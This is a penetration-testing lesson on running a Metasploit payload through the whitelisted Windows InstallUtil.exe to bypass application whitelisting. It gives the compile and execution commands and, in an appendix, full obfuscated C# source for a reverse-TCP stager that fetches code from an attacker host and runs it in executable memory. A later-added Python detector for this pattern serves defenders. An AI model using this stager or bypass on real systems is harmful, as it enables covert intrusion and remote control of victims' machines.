# Lesson 72: Executing a payload via the whitelisted Installutil.exe, part 2

## Installutil overview:

The Installer tool is a command-line utility that lets you install and uninstall server resources by executing the installer components in a specified assembly. It works together with the classes in the System.Configuration.Install namespace. For details, see Windows Installer Deployment: <https://docs.microsoft.com/zh-cn/previous-versions/2kt85ked(v=vs.120)>

**Note:** The directory containing Installutil.exe is not added to the system PATH environment variable, so `Installutil` on its own is not recognized as a command; it has to be invoked by its full path.

Configuring the payload for the whitelisted installutil.exe:

Default location on Windows 7:

```bash
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
```

**Attacker:** 192.168.1.4 Debian\
**Target:** 192.168.1.3 Windows 7

## Configure msf on the attacker:

![](/files/-LZPDdSq52H3PBTaLn_S)

## Compile on the target:

```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micropoor.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs
```

![](/files/-LZPDdSu4hQAC8g6TJj3)

**payload:**\
Micropoor.exe\
![](/files/-LZPDdSxc58ZTE6DzqOB)

**Target execution:**

```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U Micropoor.exe
```

![](/files/-LZPDdT-dCO3gh9bduND)
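From the defender's side, the command line above has a recognisable shape: InstallUtil.exe run with `/U` so that only `Uninstall()` executes, `/logfile=` and `/LogToConsole=false` to silence its logging, and an assembly loaded from an arbitrary path. The following detection logic, added here as an example and not part of the original lesson, scores constructed Sysmon-style process-creation records against exactly those traits; the sample events, the switch table and the trusted-path prefixes are assumptions for illustration.

```python
import re

# Constructed Sysmon Event ID 1 style records, not real telemetry. The first mirrors the
# command line shown on this page; the second is a plausible legitimate installer run.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U Micropoor.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "CommandLine": r'InstallUtil.exe /i "C:\Program Files\Vendor\Service.exe"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

# Switches that, combined, characterise the technique: run Uninstall() while silencing logs.
SUSPICIOUS_SWITCHES = {
    "/u": "uninstall switch (/U) runs the assembly's Installer.Uninstall() without installing anything",
    "/logfile=": "empty /logfile= suppresses the on-disk InstallUtil log",
    "/logtoconsole=false": "/LogToConsole=false suppresses console output",
}
# Assumed trusted locations for installer assemblies; tune to the environment.
TRUSTED_PREFIXES = ("c:\\program files", "c:\\windows")

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def analyze_installutil_event(event):
    """Return reasons an InstallUtil.exe run looks like whitelist abuse; [] if benign or not InstallUtil."""
    if not event.get("Image", "").lower().endswith("\\installutil.exe"):
        return []
    reasons = []
    for tok in tokenize(event.get("CommandLine", ""))[1:]:
        if tok.startswith("/"):
            if tok.lower() in SUSPICIOUS_SWITCHES:
                reasons.append(SUSPICIOUS_SWITCHES[tok.lower()])
        elif not tok.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("assembly loaded from a non-standard path: " + tok)
    return reasons

def triage(events, min_reasons=2):
    """Return (event, reasons) pairs that meet the alert threshold."""
    hits = []
    for ev in events:
        reasons = analyze_installutil_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev, reasons))
    return hits

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev["CommandLine"])
        for r in reasons:
            print("  -", r)
```

The threshold of two reasons keeps an ordinary `/i "C:\Program Files\..."` installation quiet while the page's `/logfile= /LogToConsole=false /U Micropoor.exe` invocation produces four.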

## Appendix: Micropoor.cs

**Note: x64 payload**

```csharp
using System;
using System.Net;
using System.Linq;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
using System.Configuration.Install;
using System.Windows.Forms;

// Decoy entry point; InstallUtil never calls it, it only loads the Installer class below.
public class GQLBigHgUniLuVx
{
    public static void Main()
    {
        while (true)
        {
            MessageBox.Show("doge");
            Console.ReadLine();
        }
    }
}

// RunInstaller(true) makes InstallUtil pick up this class; the /U switch invokes Uninstall().
[System.ComponentModel.RunInstaller(true)]
public class esxWUYUTWShqW : System.Configuration.Install.Installer
{
    public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
    {
        jkmhGrfzsKQeCG.LCIUtRN();
    }
}

public class jkmhGrfzsKQeCG
{
    [DllImport("kernel32")]
    private static extern UInt32 VirtualAlloc(UInt32 YUtHhF, UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp, IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);

    // Reverse-TCP stager: connect to the handler, read a 4-byte length, then the stage itself.
    static byte[] ErlgHH(string ZwznjBJY, int KsMEeo)
    {
        IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
        Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
        try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
        catch { return null; }

        byte[] UmquAHRnhhpuE = new byte[4];
        XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0);
        int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE, 0);

        // 5 extra bytes at the front hold "mov edi, <socket handle>" so the stage can reuse the connection.
        byte[] qaYyFq = new byte[kFVRSNnpj + 5];
        int SRCDELibA = 0;
        while (SRCDELibA < kFVRSNnpj)
        {
            SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj - SRCDELibA) < 4096 ? (kFVRSNnpj - SRCDELibA) : 4096, 0);
        }

        byte[] TvvzOgPLqwcFFv = BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
        Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4);
        qaYyFq[0] = 0xBF;
        return qaYyFq;
    }

    // Copy the received stage into RWX memory and run it on a new thread.
    static void cmMtjerv(byte[] HEHUjJhkrNS)
    {
        if (HEHUjJhkrNS != null)
        {
            UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0x1000, 0x40);
            Marshal.Copy(HEHUjJhkrNS, 0, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
            IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
            UInt32 wdjYKFDCCf = 0;
            IntPtr XVYcQxpp = IntPtr.Zero;
            UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf);
            WaitForSingleObject(UhxtIFnlOQatrk, 0xFFFFFFFF);
        }
    }

    public static void LCIUtRN()
    {
        byte[] IBtCWU = null;
        IBtCWU = ErlgHH("192.168.1.4", 53);
        cmMtjerv(IBtCWU);
    }
}
```

> installutil.snk 596B
>
> Micropoor
